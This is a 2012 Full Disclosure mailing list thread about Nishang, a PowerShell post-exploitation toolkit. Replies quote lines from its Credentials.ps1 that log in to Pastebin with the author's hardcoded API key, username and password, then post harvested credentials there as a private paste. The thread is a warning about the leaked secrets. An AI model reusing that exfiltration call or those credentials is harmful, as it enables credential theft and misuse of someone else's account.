Full Disclosure mailing list archives
Re: Nishang: PowerShell for Penetration Testing
From: Harry Hoffman <hhoffman () ip-solutions net>
Date: Thu, 16 Aug 2012 08:39:03 -0400
Some time ago a colleague and I collaborated on a bit of software that analyzed and reported on interesting/unknown/anomalous logs. It reported via email. We published the code to the web in the hope others would find it useful. I forgot and left my email addr as the default mail to. You'd be amazed that: a) people don't bother to look through the code/configs and b) how much information you can gather when people inadvertently send you all of their logs. Just sayin' Cheers, Harry On 08/15/2012 03:25 PM, Peter Dawson wrote:
....and this is coming from person who is "has many years experience in Penetration Testing of many Government Organizations of India and other global corporate giants. Who the friggin hell hires such peeps who give away key /userid/pwd eh ? /pd On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman <hhoffman () ip-solutions net <mailto:hhoffman () ip-solutions net>> wrote: Probably at the least want to change your pastebin password and api key: >From Credentials.ps1: Post_http "http://pastebin.com/api/api_login.php" "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin" Post_http "http://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2" " Cheers, Harry On 08/15/2012 05:49 AM, Nikhil Mittal wrote: > Hi List, > > I have written a tool in PowerShell which helps in usage of PowerShell > for post exploitation activity. The tool, called, Nishang. is a > framework and collection of PowerShell scripts. > > Details about it could be found on my blog at > http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html > > The toolkit is available at: > http://code.google.com/p/nishang/ > > Please feel free to report bugs, feedbacks and feature requests. > > Regards, > Nikhil _SamratAshok_ Mittal > http://labofapenetrationtester.blogspot.com/ > @nikhil_mitt <https://twitter.com/#%21/nikhil_mitt> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Nishang: PowerShell for Penetration Testing Nikhil Mittal (Aug 15)
- Re: Nishang: PowerShell for Penetration Testing Harry Hoffman (Aug 15)
- Re: Nishang: PowerShell for Penetration Testing Peter Dawson (Aug 15)
- Re: Nishang: PowerShell for Penetration Testing Harry Hoffman (Aug 16)
- Re: Nishang: PowerShell for Penetration Testing Peter Dawson (Aug 15)
- Re: Nishang: PowerShell for Penetration Testing Harry Hoffman (Aug 15)